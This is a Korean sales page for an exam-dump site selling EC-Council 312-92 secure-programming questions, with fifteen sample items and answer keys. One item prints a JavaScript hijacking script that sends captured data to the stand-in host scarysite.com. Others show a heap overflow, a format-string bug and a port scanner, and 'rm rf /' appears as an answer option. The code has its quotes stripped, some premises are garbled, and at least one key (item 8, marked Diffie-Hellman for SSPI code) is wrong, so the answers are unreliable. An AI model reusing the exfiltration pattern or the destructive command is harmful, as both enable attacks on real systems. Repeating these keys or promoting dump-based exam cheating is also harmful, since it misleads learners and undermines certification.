EC-COUNCIL 312-92인증시험을 패스하려면 시험대비자료선택은 필수입니다. 우리ITExamDump에서는 빠른 시일 내에EC-COUNCIL 312-92관련 자료를 제공할 수 있습니다. ITExamDump의 전문가들은 모두 경험도 많고, 그들이 연구자료는 실제시험의 문제와 답과 거이 일치합니다. ITExamDump 는 인증시험에 참가하는 분들한테 편리를 제공하는 사이트이며,여러분들이 시험패스에 도움을 줄 수 있는 사이트입니다.
우리ITExamDump 에서는 여러분들한테 아주 편리하고 시간 절약함과 바꿀 수 있는 좋은 대책을 마련하였습니다. ITExamDump에서는EC-COUNCIL 312-92인증시험관련가이드로 효과적으로EC-COUNCIL 312-92시험을 패스하도록 도와드리겠습니다.만약 여러분이 다른 사이트에서도 관련덤프자료를 보셨을 경우 페이지 아래를 보시면 자료출처는 당연히 ITExamDump 일 것입니다. ITExamDump의 자료만의 제일 전면적이고 또 최신 업데이트일것입니다.
EC-COUNCIL 인증312-92인증시험공부자료는ITExamDump에서 제공해드리는EC-COUNCIL 인증312-92덤프가 가장 좋은 선택입니다. ITExamDump에서는 시험문제가 업데이트되면 덤프도 업데이트 진행하도록 최선을 다하여 업데이트서비스를 제공해드려 고객님께서소유하신 덤프가 시장에서 가장 최신버전덤프로 되도록 보장하여 시험을 맞이할수 있게 도와드립니다.
EC-COUNCIL인증 312-92시험을 준비하기 위해 잠도 설쳐가면서 많이 힘들죠? ITExamDump덤프가 고객님의 곁을 지켜드립니다. ITExamDump에서 제공해드리는EC-COUNCIL인증 312-92덤프는 실제EC-COUNCIL인증 312-92시험문제를 연구하여 만든 공부자료이기에 최고의 품질을 자랑합니다. ITExamDump덤프를 열심히 공부하여 멋진 IT전문가의 꿈을 이루세요.
제일 빠른 시일내에 제일 간단한 방법으로EC-COUNCIL인증 312-92시험을 패스하는 방법이 없냐구요? ITExamDump의EC-COUNCIL인증 312-92덤프를 공부하시면 가능합니다. ITExamDump의EC-COUNCIL인증 312-92덤프는 많은 분들이 검증한 가장 유력한EC-COUNCIL인증 312-92시험공부자료입니다. 덤프의 문제만 기억하시면 패스는 문제없기에 제일 빠른 시일내에 시험을 패스하여 자격증 취득이 가능합니다.
ITExamDump에서는 전문EC-COUNCIL 312-92인증시험을 겨냥한 덤프 즉 문제와 답을 제공합니다.여러분이 처음EC-COUNCIL 312-92인증시험준비라면 아주 좋은 덤프입니다. ITExamDump에서 제공되는 덤프는 모두 실제시험과 아주 유사한 덤프들입니다.EC-COUNCIL 312-92인증시험패스는 보장합니다. 만약 떨어지셨다면 우리는 덤프비용전액을 환불해드립니다.
시험 번호/코드: 312-92
시험 이름: EC-COUNCIL (EC-Council Certified Secure Programmer v2)
당신이 구입하기 전에 시도
일년동안 무료 업데이트
100% 환불보장약속
100% 합격율 보장
Q&A: 99 문항
업데이트: 2014-02-17
312-92 덤프무료샘플다운로드하기: http://www.itexamdump.com/312-92.html
NO.1 What would be the result of the following code?
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char *argv[])
{
char *input=malloc(20);
char *output=malloc(20);
strcpy(output, normal output );
strcpy(input, argv[1]); printf( input at %p: %s\n , input, input);
printf( output at %p: %s\n , output, output);
printf( \n\n%s\n , output);
}
A. Stack buffer overflow
B. Heap overflow
C. Query string manipulation
D. Pointer Subterfuge
Answer: B
EC-COUNCIL최신덤프 312-92 312-92 dump 312-92자료
NO.2 Harold is programming an application that needs to be incorporate data encryption. Harold decides to
utilize an encryption algorithm that uses 4-bit working registers instead of the usual 2bit working registers.
What encryption algorithm has Harold decided to use?
A. Blowfish
B. RC5
C. RC4
D. RC6
Answer: D
EC-COUNCIL 312-92 312-92 312-92
NO.3 Processes having the CAP_NET_BIND_SERVICE
can listen on which ports?
A. Any TCP port over 1024
B. Any UDP port under 1024
C. Any TCP port under 1024
D. Any UDP port over 1024
Answer: C
EC-COUNCIL 312-92 312-92시험문제 312-92
NO.4 Kenny is the CIO for Fredrickson Entertainment, a gaming software company in Omaha. The
developers in Kenny s company have just finished creating a 3D first person shooter game that will be
released to the market within the next couple of months. Kenny is trying to decide what type of license or
activation code structure they should use for the game to prevent piracy and protect their product. Kenny
decides to go with an approach that will allow each sold copy to be activated online up to five times
because he knows his users might have multiple PCs or might need to reinstall the product at some point.
What type of activation policy has Kenny decided to go with?
A. Loose license enforced
reasonable use
B. License terms enforced
fair use
C. Strict license terms enforced
D. Monitor only mode
Answer: A
EC-COUNCIL pdf 312-92덤프 312-92 312-92 dump 312-92 dump
NO.5 David is an applications developer working for Dewer and Sons law firm in Los Angeles David just
completed a course on writing secure code and was enlightened by all the intricacies of how code must
be rewritten many times to ensure its security. David decides to go through all the applications he has
written and change them to be more secure. David comes across the following snippet in one of his
programs:
#include <stdio.h>
int main(int argc, char **argv)
{
int number = 5;
printf(argv[1]);
putchar( \n );
printf( number (%p) is equal to %d\n ,
&value, value);
}
What could David change, add, or delete to make this code more secure?
A. Change putchar( \n ) to putchar( %s , \n )
B. Change printf(argv[1]) to printf( %s , argv[1])
C. Change printf(argv[1]) to printf(constv [0])
D. Change int number = 5 to const number =
Answer: B
EC-COUNCIL 312-92 312-92 312-92 312-92자격증
NO.6 After learning from an external auditor that his code was susceptible to attack, George decided to
rewrite some of his code to look like the following. What is George preventing by changing the code?
public voif doContent(...) {
...
String s;
if ((s = getUsernameByID( userid )) != null) {
s = StringUtils.encodeToHTML(s, 50);
response.write( <br>Applicant:<u>
+ s +
</u> );
}
...
}
A. Query string manipulation
B. XSS attack
C. Cookie poisoning
D. SQL injection
Answer: B
EC-COUNCIL dumps 312-92 dumps 312-92 312-92자격증 312-92 dump 312-92 dump
NO.7 John is creating a website using ASP. John s web pages will have a number of calculations, so he
decides to create an include file that the pages will call so he does not have to rewrite the formula
numerous times. John s website will be hosted by a server running IIS. John wants to ensure that the
include source code is not revealed when the pages are viewed, so he gives the include an .asp
extension.
When IIS processes the include file, which system file will be used to hide the include source code?
A. ASP.dll
B. Include.dll
C. IISASP.dll
D. IIS.dll
Answer: A
EC-COUNCIL기출문제 312-92기출문제 312-92최신덤프 312-92자료 312-92덤프
NO.8 What security package is implemented with the following code.?
dwStatus = DsMakSpn
(
ldap ,
MyServer.Mydomain.com ,
NULL,
0,
NULL,
&pcSpnLength,
pszSpn
);
rpcStatus = RpcServerRegisterAuthInfo
(
psz
RPC_C_AUTHN_GSS_NEGOTIATE,
NULL,
NULL
);
A. Diffie-Hellman encryption
B. Repurposing
C. SSPI
D. SMDT
Answer: A
EC-COUNCIL dumps 312-92 312-92자료 312-92
NO.9 Devon is an applications developer that just got back from a conference on how to correctly write code.
Devon has a number of programs he has written that access data across WAN links, so he is particularly
concerned about their security. Devon writes a script in C++ to check the security of the programs running
on his internal servers. What will the following code from Devon s script accomplish?
#include <iostream>
#include <socket.cpp>
#include <util.h>
using namespace std;
bool tryPort(int p);
string target("");
int main(int argC, char *argV[])
{
printf("PlagueZ port scanner 0.1\n");
int startPort = getInt("start Port: ");
int endPort = getInt("end Port: ");
target = getString("Host: ");
printf("[Processing port %d to %d]\n",
startPort, endPort);
for(int i=0; i<endPort; i++)
{
printf("[Trying port: %d]\n", i);
if(tryPort(i)) // port open
printf("[Port %d is open]\n", i);
}
printf("------Scan Finished-------\n");
system("pause");
return 0;
}
bool tryPort(int p)
{
SocketClient *scan;
try
{
scan = new SocketClient(target, p);
}
catch(int e) { delete &scan; return
false; }
delete &scan;
return true;
}
A. Scan the perimeter firewall for DoS vulnerabilities
B. Create socket connections to the remote sites to check their security
C. Close off any ports used by malicious code
D. Scan for open ports
Answer: D
EC-COUNCIL덤프 312-92 312-92 pdf 312-92최신덤프 312-92시험문제
NO.10 Travis, a senior systems developer for YNY Services, received an email recently from an unknown
source. Instead of opening the email on his normal production machine, Travis decides to copy the email
to a thumb drive and examine it from a quarantined PC not on the network. Travis examines the email and
discovers a link that is supposed to take him to http://scarysite.com. Travis decides to get back on his
production computer and examine the code of that site.
From the following code snippet, what has Travis discovered?
<script>
function object() {
this.email setter = captureobject
}
function captureobject(x) {
var objstring =
for(fld in this) {
obstring += fld + :
this[fld] + , ;
}
obstring += email:
+ x;
var req = new XMLHttpRequest();
req.open( GET , http://scarysite.com?obj=
+
escape(objString), true);
req.send(null);
}
</script>
A. URL obfuscation
B. XSS attack
C. JavaScript hijacking
D. URL tampering
Answer: C
EC-COUNCIL덤프 312-92덤프 312-92 312-92
NO.11 Wayne is a gaming software developer for a large video gaming company in Los Angeles. Wayne has
just completed developing a new action/adventure game for the company that is to be released soon. To
protect the company s copyright on the game, Wayne would like to incorporate a technology that will
restrict the use of the digital files by controlling access, altering, sharing, copying, printing, and saving.
What technology does Wayne want to use?
A. ARM
B. WRM
C. DRM
D. Diffusion
Answer: C
EC-COUNCIL시험문제 312-92덤프 312-92시험문제
NO.12 Which Linux command will securely delete a file by overwriting its contents?
A. rm rf /
B. Shred
C. ps rm
D. del rm
Answer: B
EC-COUNCIL덤프 312-92 pdf 312-92덤프
NO.13 Shayla is designing a web-based application that will pass data to and from a company extranet. This
data is very sensitive and must be protected at all costs. Shayla will use a digital certificate and a digital
signature to protect the data. The digital signature she has chosen to use is based on the difficulty in
computing discrete logarithms. Which digital signature has she chosen?
A. Rabin
B. Diffie-Hellman
C. SA-PSS
D. ElGamal
Answer: D
EC-COUNCIL pdf 312-92 312-92 dumps 312-92 dumps 312-92시험문제 312-92시험문제
NO.14 Steve is using the libcap library to create scripts for capturing and analyzing network traffic.
Steve has never used libcap before and is struggling with finding out the correct functions to use. Steve is
trying to pick the default network interface in his script and does not know which function to use. Which
function would he use to correctly choose the default interface in the script?
A. pcap_open_live
B. pcap_int_default
C. pcap_lookupdev
D. pcap_use_int
Answer: C
EC-COUNCIL 312-92최신덤프 312-92자료 312-92 312-92시험문제
NO.15 Fred is planning on using the windows socket application ClientApp.exe program to create a client-side
application that his employees will use. This program will access backend programs from two different
remote sites over WAN connections. If Fred does not make any modifications to the ClientApp.exe default
settings, what port must he have the network engineer open in order for the application to communicate?
A. 21
B. 23
C. 25
D. 80
Answer: D
EC-COUNCIL 312-92 312-92 dumps 312-92덤프 312-92인증 312-92자료
ITexamdump의 LOT-412덤프의 VCE테스트프로그램과 IIA-CIA-Part1덤프는 한방에 시험을 패스하도록 도와드립니다. ITexamdump 에서는 최신버전의 ECP-102시험에 대비한 고품질 덤프와 C4040-225시험 최신버전덤프를 제공해드립니다. 최고품질 C2040-440시험자료는 100% 간단하게 시험패스하도록 최선을 다하고 있습니다. IT인증시험패스는 이토록 간단합니다.
댓글 없음:
댓글 쓰기